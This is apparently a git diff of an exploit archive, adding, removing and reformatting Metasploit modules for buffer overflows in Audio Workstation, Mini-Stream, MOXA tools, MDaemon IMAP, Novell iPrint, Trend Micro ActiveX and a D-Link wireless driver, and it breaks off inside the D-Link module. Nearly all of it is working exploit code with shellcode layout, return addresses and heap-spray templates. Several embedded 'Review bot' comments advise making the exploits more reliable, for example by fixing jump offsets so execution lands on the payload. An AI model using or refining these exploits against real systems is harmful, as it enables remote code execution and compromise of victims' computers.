@@ -1,81 +0,0 @@ -## -# $Id: audio_wkstn_pls.rb 10477 2010-09-25 11:59:02Z mc $ -## - -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ -## - -require 'msf/core' - -class Metasploit3 < Msf::Exploit::Remote - Rank = GoodRanking - - include Msf::Exploit::FILEFORMAT - include Msf::Exploit::Remote::Seh - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Audio Workstation 6.4.2.4.3 pls Buffer Overflow', - 'Description' => %q{ - This module exploits a buffer overflow in Audio Workstation 6.4.2.4.3. - When opening a malicious pls file with the Audio Workstation, - a remote attacker could overflow a buffer and execute - arbitrary code. - }, - 'License' => MSF_LICENSE, - 'Author' => [ 'germaya_x', 'dookie', ], - 'Version' => '$Revision: 10477 $', - 'References' => - [ - [ 'CVE', '2009-0476' ], - [ 'OSVDB', '55424' ], - [ 'URL', 'http://www.exploit-db.com/exploits/10353' ], - ], - 'DefaultOptions' => - { - 'EXITFUNC' => 'seh', - 'DisablePayloadHandler' => 'true', - }, - 'Payload' => - { - 'Space' => 4100, - 'BadChars' => "\x00", - 'StackAdjustment' => -3500, - 'EncoderType' => Msf::Encoder::Type::AlphanumUpper, - 'DisableNops' => 'True', - }, - 'Platform' => 'win', - 'Targets' => - [ - [ 'Windows Universal', { 'Ret' => 0x1101031E } ], # p/p/r in bass.dll - ], - 'Privileged' => false, - 'DisclosureDate' => 'Dec 08 2009', - 'DefaultTarget' => 0)) - - register_options( - [ - OptString.new('FILENAME', [ true, 'The file name.', 'msf.pls']), - ], self.class) - - end - - def exploit - - sploit = rand_text_alpha_upper(1308) - sploit << "\xeb\x16\x90\x90" - sploit << [target.ret].pack('V') - sploit << make_nops(32) - sploit << payload.encoded - sploit << rand_text_alpha_upper(4652 - payload.encoded.length) - - print_status("Creating '#{datastore['FILENAME']}' 
file ...") - file_create(sploit) - - end - -end diff --git a/platforms/windows/local/16676.rb b/platforms/windows/local/16676.rb deleted file mode 100755 index 3474c347d..000000000 --- a/platforms/windows/local/16676.rb +++ /dev/null 
@@ -1,80 +0,0 @@ -## -# $Id: mini_stream.rb 11516 2011-01-08 01:13:26Z jduck $ -## - -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ -## - -require 'msf/core' - -class Metasploit3 < Msf::Exploit::Remote - Rank = NormalRanking - - include Msf::Exploit::FILEFORMAT - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Mini-Stream 3.0.1.1 Buffer Overflow Exploit', - 'Description' => %q{ - This module exploits a stack buffer overflow in Mini-Stream 3.0.1.1 - By creating a specially crafted pls file, an an attacker may be able - to execute arbitrary code. - }, - 'License' => MSF_LICENSE, - 'Author' => - [ - 'CORELAN Security Team ', - 'Ron Henry ', # Return address update - 'dijital1', - ], - 'Version' => '$Revision: 11516 $', - 'References' => - [ - [ 'OSVDB', '61341' ], - [ 'URL', 'http://www.exploit-db.com/exploits/10745' ], - ], - 'DefaultOptions' => - { - 'EXITFUNC' => 'thread', - 'DisablePayloadHandler' => 'true', - }, - 'Payload' => - { - 'Space' => 3500, - 'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x26\x3d\x2b\x3f\x3a\x3b\x2d\x2c\x2f\x23\x2e\x5c\x30", - 'StackAdjustment' => -3500, - }, - 'Platform' => 'win', - 'Targets' => - [ - [ 'Windows XP SP3 - English', { 'Ret' => 0x7e429353} ], # 0x7e429353 JMP ESP - USER32.dll - [ 'Windows XP SP2 - English', { 'Ret' => 0x7c941eed} ], # 0x7c941eed JMP ESP - SHELL32.dll - ], - 'Privileged' => false, - 'DisclosureDate' => 'Dec 25 2009', - 'DefaultTarget' => 0)) - - register_options( - [ - OptString.new('FILENAME', [ false, 'The file name.', 'metasploit.pls']), - ], self.class) - end - - - def exploit - sploit = rand_text_alphanumeric(17403) - sploit << [target.ret].pack('V') - sploit << "CAFE" * 8 - sploit << payload.encoded - - print_status("Creating '#{datastore['FILENAME']}' 
file ...") - file_create(sploit) - print_status("Copy '#{datastore['FILENAME']}' to a web server and pass the URL to the application") - end - -end - diff --git a/platforms/windows/local/41705.rb b/platforms/windows/local/41705.rb deleted file mode 100755 index 1c90f74b3..000000000 --- a/platforms/windows/local/41705.rb +++ /dev/null 
@@ -1,102 +0,0 @@ -## -# This module requires Metasploit: http://metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -require 'msf/core' - -class MetasploitModule < Msf::Exploit::Remote - - Rank = AverageRanking - - include Msf::Exploit::FILEFORMAT - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'MOXA MediaDBPlayback ActiveX Control Buffer Overflow', - 'Description' => %q{ - This module exploits a stack buffer overflow in MOXA_ActiveX_SDK. When - sending an overly long string to the PlayFileName() of MediaDBPlayback.DLL (2.2.0.5) - an attacker may be able to execute arbitrary code. - }, - 'License' => MSF_LICENSE, - 'Author' => [ 'MC' ], - 'References' => - [ - [ 'CVE', '2010-4742' ], - [ 'OSVDB', '68986'], - [ 'URL', 'http://www.moxa.com' ], - ], - 'DefaultOptions' => - { - 'EXITFUNC' => 'process', - 'DisablePayloadHandler' => 'true', - }, - 'Payload' => - { - 'Space' => 1024, - 'BadChars' => "\x00", - }, - 'Platform' => 'win', - 'Targets' => - [ - [ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0a0a0a0a } ] - ], - 'DisclosureDate' => 'Oct 19 2010', - 'DefaultTarget' => 0)) - - register_options( - [ - OptString.new('FILENAME', [ false, 'The file name.', 'msf.html']), - ], self.class) - end - - def exploit - # Encode the shellcode. - shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) - - # Create some nops. - nops = Rex::Text.to_unescape(make_nops(4)) - - # Set the return. - ret = Rex::Text.uri_encode([target.ret].pack('L')) - - # Randomize the javascript variable names. 
- vname = rand_text_alpha(rand(100) + 1) - var_i = rand_text_alpha(rand(30) + 2) - rand1 = rand_text_alpha(rand(100) + 1) - rand2 = rand_text_alpha(rand(100) + 1) - rand3 = rand_text_alpha(rand(100) + 1) - rand4 = rand_text_alpha(rand(100) + 1) - rand5 = rand_text_alpha(rand(100) + 1) - rand6 = rand_text_alpha(rand(100) + 1) - rand7 = rand_text_alpha(rand(100) + 1) - rand8 = rand_text_alpha(rand(100) + 1) - - content = %Q| - - - - - | - - print_status("Creating '#{datastore['FILENAME']}' file ...") - - file_create(content) - end - -end \ No newline at end of file diff --git a/platforms/windows/local/41713.rb b/platforms/windows/local/41713.rb deleted file mode 100755 index 0e2af869a..000000000 --- a/platforms/windows/local/41713.rb +++ /dev/null 
@@ -1,76 +0,0 @@ -## -# This module requires Metasploit: http://metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -class MetasploitModule < Msf::Exploit::Remote - - Rank = GreatRanking - - include Msf::Exploit::Remote::TcpServer - include Msf::Exploit::Remote::Seh - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'MOXA Device Manager Tool 2.1 Buffer Overflow', - 'Description' => %q{ - This module exploits a stack buffer overflow in MOXA MDM Tool 2.1. - When sending a specially crafted MDMGw (MDM2_Gateway) response, an - attacker may be able to execute arbitrary code. - }, - 'Author' => [ 'Ruben Santamarta', 'MC' ], - 'License' => MSF_LICENSE, - 'References' => - [ - [ 'CVE', '2010-4741'], - [ 'OSVDB', '69027'], - [ 'URL', 'http://www.reversemode.com/index.php?option=com_content&task=view&id=70&Itemid=' ], - [ 'URL', 'http://www.us-cert.gov/control_systems/pdf/ICSA-10-301-01A.pdf' ] - ], - 'DefaultOptions' => - { - 'EXITFUNC' => 'thread', - 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate' - }, - 'Payload' => - { - 'Space' => 600, - 'BadChars' => "\x00\x0a\x0d\x20", - 'StackAdjustment' => -3500 - }, - 'Platform' => 'win', - 'Targets' => - [ - [ 'MOXA MDM Tool 2.1', { 'Ret' => 0x1016bca7 } ], # UTU.dll / keeping the rop version for me... 
- ], - 'Privileged' => false, - 'DisclosureDate' => 'Oct 20 2010', - 'DefaultTarget' => 0)) - - register_options( - [ - OptPort.new('SRVPORT', [ true, "The daemon port to listen on.", 54321 ]) - ], self.class) - end - - def on_client_connect(client) - - return if ((p = regenerate_payload(client)) == nil) - - client.get_once - - sploit = rand_text_alpha_upper(18024) - - sploit[0, 4] = [0x29001028].pack('V') - sploit[472, payload.encoded.length] = payload.encoded - sploit[1072, 8] = generate_seh_record(target.ret) - sploit[1080, 5] = Metasm::Shellcode.assemble(Metasm::Ia32.new, "call $-550").encode_string - - client.put(sploit) - - handler(client) - - service.close_client(client) - - end -end \ No newline at end of file diff --git a/platforms/windows/remote/1151.pm b/platforms/windows/remote/1151.pm index 65d91af39..b1713fb09 100755 --- a/platforms/windows/remote/1151.pm +++ b/platforms/windows/remote/1151.pm 
@@ -1,131 +1,83 @@ ## -# This file is part of the Metasploit Framework and may be redistributed -# according to the licenses defined in the Authors field below. In the -# case of an unknown or missing license, this file defaults to the same -# license as the core Framework (dual GPLv2 and Artistic). The latest -# version of the Framework can always be obtained from metasploit.com. +# $Id: mdaemon_cram_md5.rb 9583 2010-06-22 19:11:05Z todb $ ## -package Msf::Exploit::mdaemon_imap_cram_md5; -use strict; -use base 'Msf::Exploit'; -use Msf::Socket::Tcp; -use Pex::Text; +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## -my $advanced = { }; +require 'msf/core' -my $info = { - 'Name' => 'Mdaemon 8.0.3 IMAD CRAM-MD5 Authentication Overflow', - 'Version' => '$Revision: 1.2 $', - 'Authors' => [ 'anonymous' ], +class Metasploit3 < Msf::Exploit::Remote + Rank = GreatRanking - 'Arch' => [ 'x86' ], - 'OS' => [ 'win32'], - 'Priv' => 1, + include Msf::Exploit::Remote::Imap - 'AutoOpts' => { 'EXITFUNC' => 'process' }, - 'UserOpts' => - { - 'RHOST' => [1, 'ADDR', 'The target address'], - 'RPORT' => [1, 'PORT', 'The target port', 143], - }, + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Mdaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow', + 'Description' => %q{ + This module exploits a buffer overflow in the CRAM-MD5 + authentication of the MDaemon IMAP service. This + vulnerability was discovered by Muts. 
+ }, + 'Author' => [ 'anonymous' ], + 'License' => BSD_LICENSE, + 'Version' => '$Revision: 9583 $', + 'References' => + [ + [ 'CVE', '2004-1520'], + [ 'OSVDB', '11838'], + [ 'BID', '11675'], + ], + 'Privileged' => true, + 'DefaultOptions' => + { + 'EXITFUNC' => 'process', + }, + 'Payload' => + { + 'Space' => 500, + 'BadChars' => "\x00", + 'StackAdjustment' => -3500, + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'MDaemon IMAP 8.0.3 Windows XP SP2', { } ], + ], + 'DisclosureDate' => 'Nov 12 2004', + 'DefaultTarget' => 0)) + end - 'Payload' => - { - 'Prepend' => "\x81\xc4\x1f\xff\xff\xff\x44", # make stack happy - 'Space' => 500, - 'BadChars' => "\x00", - }, + def exploit + connect - 'Description' => Pex::Text::Freeform(qq{ - This module exploits a buffer overflow in the CRAM-MD5 authentication of the - MDaemon IMAP service. This vulnerability was discovered by Muts. -}), + print_status("Asking for CRAM-MD5 authentication...") + sock.put("a001 authenticate cram-md5\r\n") + res = sock.get_once - 'Refs' => - [ - ['OSVDB', '11838'], - ['CVE', '2004-1520'], - ['BID', '11675'], - ], - 'Targets' => - [ - ['MDaemon IMAP 8.0.3 Windows XP SP2'], - ], + print_status("Received CRAM-MD5 answer: #{res.chomp}") + # Magic no return-address exploitation ninjaness! 
+ buf = 'AAAA' + payload.encoded + make_nops(258) + "\xe9\x05\xfd\xff\xff" + req = Rex::Text.encode_base64(buf) + "\r\n" + sock.put(req) + res = sock.get_once - 'Keys' => ['mdaemon'], - }; + print_status("Received authentication reply: #{res.chomp}") + print_status("Sending LOGOUT to close the thread and trigger an exception") + sock.put("a002 LOGOUT\r\n") + res = sock.get_once -sub new { - my $class = shift; - my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); + print_status("Received LOGOUT reply: #{res.chomp}") + select(nil,nil,nil,1) - return($self); -} + handler + disconnect + end -sub Exploit { - my $self = shift; - - my $targetHost = $self->GetVar('RHOST'); - my $targetPort = $self->GetVar('RPORT'); - my $targetIndex = $self->GetVar('TARGET'); - my $encodedPayload = $self->GetVar('EncodedPayload'); - my $shellcode = $encodedPayload->Payload; - my $target = $self->Targets->[$targetIndex]; - - if (! $self->InitNops(128)) { - $self->PrintLine("[*] Failed to initialize the NOP module."); - return; - } - - my $sock = Msf::Socket::Tcp->new( - 'PeerAddr' => $targetHost, - 'PeerPort' => $targetPort, - ); - - if($sock->IsError) { - $self->PrintLine('Error creating socket: ' . $sock->GetError); - return; - } - - my $resp = $sock->Recv(-1); - chomp($resp); - $self->PrintLine('[*] Got Banner: ' . $resp); - - my $req = "a001 authenticate cram-md5\r\n"; - $sock->Send($req); - $self->PrintLine('[*] CRAM-MD5 authentication method asked'); - - $resp = $sock->Recv(-1); - chomp($resp); - $self->PrintLine('[*] Got CRAM-MD5 answer: ' . $resp); - - # Magic no return-address exploitation ninjaness! - $req = "AAAA" . $shellcode . $self->MakeNops(258) . "\xe9\x05\xfd\xff\xff"; - $req = Pex::Text::Base64Encode($req, '') . "\r\n"; - $sock->Send($req); - $self->PrintLine('[*] CRAM-MD5 authentication with shellcode sent'); - - $resp = $sock->Recv(-1); - chomp($resp); - $self->PrintLine('[*] Got authentication reply: ' . 
$resp); - - $req = "a002 LOGOUT\r\n"; - $sock->Send($req); - $self->PrintLine('[*] Send LOGOUT to close the thread and trigger an exception'); - - $resp = $sock->Recv(-1); - chomp($resp); - $self->PrintLine('[*] Got LOGOUT reply: ' . $resp); - - $self->PrintLine("[*] Overflow request sent, sleeping for one second"); - select(undef, undef, undef, 1); - - $self->Handler($sock); - return; -} - -1; - -# milw0rm.com [2005-08-12] +end diff --git a/platforms/windows/remote/15072.rb b/platforms/windows/remote/15072.rb index e519dbe9d..879303bce 100755 --- a/platforms/windows/remote/15072.rb +++ b/platforms/windows/remote/15072.rb @@ -1,3 +1,14 @@ +## +# $Id: novelliprint_callbackurl.rb 10429 2010-09-21 18:46:29Z jduck $ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + ## # novelliprint_callbackurl.rb # @@ -39,13 +50,13 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => 'Novell iPrint Client ActiveX Control call-back-url Buffer Overflow', 'Description' => %q{ This module exploits a stack-based buffer overflow in Novell iPrint Client 5.42. - When sending an overly long string to the 'call-back-url' parameter in an - op-client-interface-version action of ienipp.ocx an attacker may be able to - execute arbitrary code. + When sending an overly long string to the 'call-back-url' parameter in an + op-client-interface-version action of ienipp.ocx an attacker may be able to + execute arbitrary code. }, 'License' => MSF_LICENSE, 'Author' => [ 'Trancer '$Revision:$', + 'Version' => '$Revision: 10429 $', 'References' => [ [ 'CVE', '2010-1527' ], 
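Review bot: Every `sock.get_once` result in the new `exploit` is dereferenced unguarded with `res.chomp`, and the LOGOUT step is explicitly described as closing the thread and triggering an exception, so if the server drops the connection or times out there (where `get_once` would presumably yield nil) the module raises NoMethodError before `handler` runs. Guard the three reads, e.g. `print_status("Received LOGOUT reply: #{res.to_s.chomp}")`, or read with `res = sock.get_once || ''`. Separately, the backward jump `\xe9\x05\xfd\xff\xff` hard-codes a -763 displacement that lands on the start of `payload.encoded` only when that string is exactly the 500-byte `Space` (4 + 500 + 258 = 762 bytes precede the 5-byte jump); add `# jmp -763: lands at offset 4, assumes payload.encoded is padded to Space (500)` so the dependency is visible if `Space` is ever changed.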
@@ -85,15 +96,15 @@ class Metasploit3 < Msf::Exploit::Remote # Encode the shellcode. shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) - + # Setup exploit buffers nops = Rex::Text.to_unescape([target.ret].pack('V')) ret = [target.ret].pack('V') ret = ret * 250 blocksize = 0x40000 - fillto = 500 + fillto = 500 offset = target['Offset'] - + # ActiveX parameters clsid = "36723F97-7AA0-11D4-8919-FF2D71D0D32C" @@ -109,7 +120,7 @@ class Metasploit3 < Msf::Exploit::Remote j_memory = rand_text_alpha(rand(100) + 1) j_counter = rand_text_alpha(rand(30) + 2) - html = %Q| + html = %Q| - - + + | @@ -140,4 +151,4 @@ for (#{j_counter} = 0; #{j_counter} < #{fillto}; #{j_counter}++) { handler(cli) end -end \ No newline at end of file +end diff --git a/platforms/windows/remote/15168.rb b/platforms/windows/remote/15168.rb index 9b66b6d42..cf43c48cb 100755 --- a/platforms/windows/remote/15168.rb +++ b/platforms/windows/remote/15168.rb @@ -1,3 +1,14 @@ +## +# $Id: trendmicro_extsetowner.rb 10538 2010-10-04 04:26:09Z jduck $ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + ## # trendmicro_extsetowner.rb # 
@@ -37,14 +48,14 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Trend Micro Internet Security Pro 2010 ActiveX extSetOwner() Remote Code Execution', 'Description' => %q{ - This module exploits a remote code execution vulnerability in Trend Micro - Internet Security Pro 2010 ActiveX. - When sending an invalid pointer to the extSetOwner() function of UfPBCtrl.dll - an attacker may be able to execute arbitrary code. + This module exploits a remote code execution vulnerability in Trend Micro + Internet Security Pro 2010 ActiveX. + When sending an invalid pointer to the extSetOwner() function of UfPBCtrl.dll + an attacker may be able to execute arbitrary code. }, 'License' => MSF_LICENSE, 'Author' => [ 'Trancer '$Revision:$', + 'Version' => '$Revision: 10538 $', 'References' => [ [ 'CVE', '2010-3189' ], @@ -64,7 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - [ 'Windows XP SP0-SP2 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x00C750A1 } ] + [ 'Windows XP SP0-SP2 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x00C750A1 } ] #?? ], 'DisclosureDate' => 'Aug 25 2010', 'DefaultTarget' => 0)) @@ -84,13 +95,13 @@ class Metasploit3 < Msf::Exploit::Remote # Encode the shellcode. shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) - + # Setup exploit buffers nops = Rex::Text.to_unescape(make_nops(4)) ret = Rex::Text.to_unescape([target.ret].pack('V')) blocksize = 0x40000 - fillto = 500 - + fillto = 500 + # ActiveX parameters clsid = "15DBC3F9-9F0A-472E-8061-043D9CEC52F0" 
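Review bot: The `#??` appended to the sole target entry records a doubt without stating it, which no later maintainer can act on. The `Ret` value is not a gadget: as the later hunk shows, it is passed straight through `ret = Rex::Text.to_unescape([target.ret].pack('V'))` into `extSetOwner(unescape('#{ret}'))`, so it is the heap-spray address the pointer argument must land on. Replace the marker with a comment that says this, e.g. `# sprayed heap address handed to extSetOwner(); not a gadget - confirm the spray covers it on the listed targets`, and if the doubt is about reaching 0x00C750A1 with 500 blocks of 0x40000 bytes, say that explicitly.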
@@ -118,9 +129,9 @@ var #{j_fillblock} = #{j_nops}.substring(0,#{j_slackspace}); var #{j_block} = #{j_nops}.substring(0,#{j_nops}.length - #{j_slackspace}); while (#{j_block}.length + #{j_slackspace} < #{blocksize}) #{j_block} = #{j_block} + #{j_block} + #{j_fillblock}; var #{j_memory} = new Array(); -for (#{j_counter} = 0; #{j_counter} < #{fillto}; #{j_counter}++) { +for (#{j_counter} = 0; #{j_counter} < #{fillto}; #{j_counter}++) { #{j_memory}[#{j_counter}] = #{j_block} + #{j_shellcode}; -} +} #{ufpbctrl}.extSetOwner(unescape('#{ret}')); | @@ -133,4 +144,4 @@ for (#{j_counter} = 0; #{j_counter} < #{fillto}; #{j_counter}++) { # Handle the payload handler(cli) end -end \ No newline at end of file +end diff --git a/platforms/windows/remote/16381.rb b/platforms/windows/remote/16381.rb index 338629bf3..0e2af869a 100755 --- a/platforms/windows/remote/16381.rb +++ b/platforms/windows/remote/16381.rb 
@@ -1,82 +1,76 @@ ## -# $Id: moxa_mdmtool.rb 11039 2010-11-14 19:03:24Z jduck $ +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework ## -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ -## +class MetasploitModule < Msf::Exploit::Remote -class Metasploit3 < Msf::Exploit::Remote + Rank = GreatRanking - Rank = GreatRanking + include Msf::Exploit::Remote::TcpServer + include Msf::Exploit::Remote::Seh - include Msf::Exploit::Remote::TcpServer - include Msf::Exploit::Remote::Seh + def initialize(info = {}) + super(update_info(info, + 'Name' => 'MOXA Device Manager Tool 2.1 Buffer Overflow', + 'Description' => %q{ + This module exploits a stack buffer overflow in MOXA MDM Tool 2.1. + When sending a specially crafted MDMGw (MDM2_Gateway) response, an + attacker may be able to execute arbitrary code. + }, + 'Author' => [ 'Ruben Santamarta', 'MC' ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2010-4741'], + [ 'OSVDB', '69027'], + [ 'URL', 'http://www.reversemode.com/index.php?option=com_content&task=view&id=70&Itemid=' ], + [ 'URL', 'http://www.us-cert.gov/control_systems/pdf/ICSA-10-301-01A.pdf' ] + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'thread', + 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate' + }, + 'Payload' => + { + 'Space' => 600, + 'BadChars' => "\x00\x0a\x0d\x20", + 'StackAdjustment' => -3500 + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'MOXA MDM Tool 2.1', { 'Ret' => 0x1016bca7 } ], # UTU.dll / keeping the rop version for me... 
+ ], + 'Privileged' => false, + 'DisclosureDate' => 'Oct 20 2010', + 'DefaultTarget' => 0)) - def initialize(info = {}) - super(update_info(info, - 'Name' => 'MOXA Device Manager Tool 2.1 Buffer Overflow', - 'Description' => %q{ - This module exploits a stack buffer overflow in MOXA MDM Tool 2.1. - When sending a specially crafted MDMGw (MDM2_Gateway) response, an - attacker may be able to execute arbitrary code. - }, - 'Author' => [ 'Ruben Santamarta', 'MC' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision: 11039 $', - 'References' => - [ - [ 'OSVDB', '69027'], - [ 'URL', 'http://www.reversemode.com/index.php?option=com_content&task=view&id=70&Itemid=' ], - [ 'URL', 'http://www.us-cert.gov/control_systems/pdf/ICS-Alert-10-293-02.pdf' ], - ], - 'DefaultOptions' => - { - 'EXITFUNC' => 'thread', - 'InitialAutoRunScript' => 'migrate -f', - }, - 'Payload' => - { - 'Space' => 600, - 'BadChars' => "\x00\x0a\x0d\x20", - 'StackAdjustment' => -3500, - }, - 'Platform' => 'win', - 'Targets' => - [ - [ 'MOXA MDM Tool 2.1', { 'Ret' => 0x1016bca7 } ], # UTU.dll / keeping the rop version for me... 
- ], - 'Privileged' => false, - 'DisclosureDate' => 'Oct 20 2010', - 'DefaultTarget' => 0)) + register_options( + [ + OptPort.new('SRVPORT', [ true, "The daemon port to listen on.", 54321 ]) + ], self.class) + end - register_options( - [ - OptPort.new('SRVPORT', [ true, "The daemon port to listen on.", 54321 ]) - ], self.class) - end + def on_client_connect(client) - def on_client_connect(client) + return if ((p = regenerate_payload(client)) == nil) - return if ((p = regenerate_payload(client)) == nil) + client.get_once - client.get_once + sploit = rand_text_alpha_upper(18024) - sploit = rand_text_alpha_upper(18024) + sploit[0, 4] = [0x29001028].pack('V') + sploit[472, payload.encoded.length] = payload.encoded + sploit[1072, 8] = generate_seh_record(target.ret) + sploit[1080, 5] = Metasm::Shellcode.assemble(Metasm::Ia32.new, "call $-550").encode_string - sploit[0, 4] = [0x29001028].pack('V') - sploit[472, payload.encoded.length] = payload.encoded - sploit[1072, 8] = generate_seh_record(target.ret) - sploit[1080, 5] = Metasm::Shellcode.assemble(Metasm::Ia32.new, "call $-550").encode_string + client.put(sploit) - client.put(sploit) + handler(client) - handler(client) + service.close_client(client) - service.close_client(client) - - end -end + end +end \ No newline at end of file diff --git a/platforms/windows/remote/16386.rb b/platforms/windows/remote/16386.rb deleted file mode 100755 index 431ba9cff..000000000 --- a/platforms/windows/remote/16386.rb +++ /dev/null 
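Review bot: The `call $-550` written at offset 1080 targets offset 530, which is 58 bytes into the 600-byte payload slot starting at 472, so it only reaches runnable code if `payload.encoded` arrives with a leading nop sled of at least that length; with a payload encoded close to `Space`, the call lands mid-shellcode. Either land on the slot start with `sploit[1080, 5] = Metasm::Shellcode.assemble(Metasm::Ia32.new, "call $-608").encode_string` or document the dependency inline with `# lands at 472+58; relies on the nop sled the framework prepends to fill 'Space'` — confirm which is intended. Separately, `p` from `regenerate_payload(client)` is assigned but the buffer is filled from `payload.encoded`; `sploit[472, p.encoded.length] = p.encoded` makes the per-client regeneration explicit, assuming `regenerate_payload` does not already update `payload` itself.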
@@ -1,202 +0,0 @@ -## -# $Id: dlink_wifi_rates.rb 9670 2010-07-03 03:19:07Z jduck $ -## - -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ -## - -require 'msf/core' - -class Metasploit3 < Msf::Exploit::Remote - Rank = LowRanking - - include Msf::Exploit::Lorcon2 - include Msf::Exploit::KernelMode - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'D-Link DWL-G132 Wireless Driver Beacon Rates Overflow', - 'Description' => %q{ - This module exploits a stack buffer overflow in the A5AGU.SYS driver provided - with the D-Link DWL-G132 USB wireless adapter. This stack buffer overflow - allows remote code execution in kernel mode. The stack buffer overflow is triggered - when a 802.11 Beacon frame is received that contains a long Rates information - element. This exploit was tested with version 1.0.1.41 of the - A5AGU.SYS driver and a D-Link DWL-G132 USB adapter (HW: A2, FW: 1.02). Newer - versions of the A5AGU.SYS driver are provided with the D-Link WUA-2340 - adapter and appear to resolve this flaw, but D-Link does not offer an updated - driver for the DWL-G132. Since this vulnerability is exploited via beacon frames, - all cards within range of the attack will be affected. The tested adapter used - a MAC address in the range of 00:11:95:f2:XX:XX. - - Vulnerable clients will need to have their card in a non-associated state - for this exploit to work. The easiest way to reproduce this bug is by starting - the exploit and then accessing the Windows wireless network browser and - forcing it to refresh. - - D-Link was NOT contacted about this flaw. 
A search of the SecurityFocus - database indicates that D-Link has not provided an official patch or - solution for any of the seven flaws listed at the time of writing: - (BIDs 13679, 16621, 16690, 18168, 18299, 19006, and 20689). - - As of November 17th, 2006, D-Link has fixed the flaw it the latest version of the - DWL-G132 driver (v1.21). - - This module depends on the Lorcon2 library and only works on the Linux platform - with a supported wireless card. Please see the Ruby Lorcon2 documentation - (external/ruby-lorcon/README) for more information. - }, - 'Author' => - [ - 'hdm', # discovery, exploit dev - 'skape', # windows kernel ninjitsu - 'Johnny Cache ' # making all of this possible - ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision: 9670 $', - 'References' => - [ - ['CVE', '2006-6055'], - ['OSVDB', '30296'], - ['URL', 'http://projects.info-pull.com/mokb/MOKB-13-11-2006.html'], - ['URL', 'ftp://ftp.dlink.com/Wireless/dwlg132/Driver/DWLG132_driver_102.zip'], - ], - 'Privileged' => true, - - 'DefaultOptions' => - { - 'EXITFUNC' => 'thread', - }, - - 'Payload' => - { - # Its a beautiful day in the neighborhood... 
- 'Space' => 1000 - }, - 'Platform' => 'win', - 'Targets' => - [ - # Windows XP SP2 with the latest updates - # 5.1.2600.2622 (xpsp_sp2_gdr.050301-1519) - [ 'Windows XP SP2 (5.1.2600.2122), A5AGU.sys 1.0.1.41', - { - 'Ret' => 0x8066662c, # jmp edi - 'Platform' => 'win', - 'Payload' => - { - 'ExtendedOptions' => - { - 'Stager' => 'sud_syscall_hook', - 'PrependUser' => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500 - 'Recovery' => 'idlethread_restart', - 'KiIdleLoopAddress' => 0x804dbb27, - } - } - } - ], - - # Windows XP SP2 install media, no patches - # 5.1.2600.2180 (xpsp_sp2_rtm_040803-2158) - [ 'Windows XP SP2 (5.1.2600.2180), A5AGU.sys 1.0.1.41', - { - 'Ret' => 0x804f16eb, # jmp edi - 'Platform' => 'win', - 'Payload' => - { - 'ExtendedOptions' => - { - 'Stager' => 'sud_syscall_hook', - 'PrependUser' => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500 - 'Recovery' => 'idlethread_restart', - 'KiIdleLoopAddress' => 0x804dc0c7, - } - } - } - ] - ], - 'DefaultTarget' => 0, - 'DisclosureDate' => 'Nov 13 2006')) - - register_options( - [ - OptString.new('ADDR_DST', [ true, "The MAC address to send this to",'FF:FF:FF:FF:FF:FF']), - OptInt.new('RUNTIME', [ true, "The number of seconds to run the attack", 60]) - ], self.class) - end - - def exploit - open_wifi - - stime = Time.now.to_i - rtime = datastore['RUNTIME'].to_i - count = 0 - - print_status("Sending exploit beacons for #{datastore['RUNTIME']} seconds...") - while (stime + rtime > Time.now.to_i) - wifi.write(create_beacon) - select(nil, nil, nil, 0.10) if (count % 100 == 0) - - count += 1 - - # Exit if we get a session - break if session_created? 
